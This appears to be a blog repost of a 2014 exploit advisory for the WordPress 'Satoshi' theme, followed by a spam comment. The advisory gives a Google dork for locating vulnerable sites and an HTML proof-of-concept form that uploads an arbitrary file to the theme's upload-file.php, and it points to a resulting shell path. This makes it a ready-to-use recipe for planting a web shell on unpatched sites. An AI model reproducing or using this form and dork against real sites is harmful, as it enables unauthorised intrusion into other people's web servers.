Satoshi Theme - File Upload CSRF




#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================


Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352
Miscellaneous

Submitter Anonymous
Views 750
Verified No
WPVDB ID 7709

-- Proof Of Concept --

When vuln : -

CSRF : 


<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

If Succes  : Succes

Shell Path : Here



Top Link
• Line Mod Terbaru => Here
• Penyedia Hosting Terbaik => Here
Previous
Next Post »

1 comments:

Click here for comments
Html Pro
admin
September 17, 2017 at 1:43 AM ×

HTML Pro Team has got an extensive expertise in PSD To Joomla Theme Conversion with the ability to work on Joomla plug-in development and customization, Shopping Cart Plug-ins, Commercial Plug-in Implementations, Display Compatibility and Schema with Load Page Speed Optimization and all you can think a Joomla based site can do. If you’re looking to build a Joomla website in a hurry/jiffy and effortlessly – our experts will slice your PSD into HTML then code a Joomla theme for your next project with 100% satisfaction!

Congrats bro Html Pro you got PERTAMAX...! hehehehe...
Reply
avatar
Thanks for your comment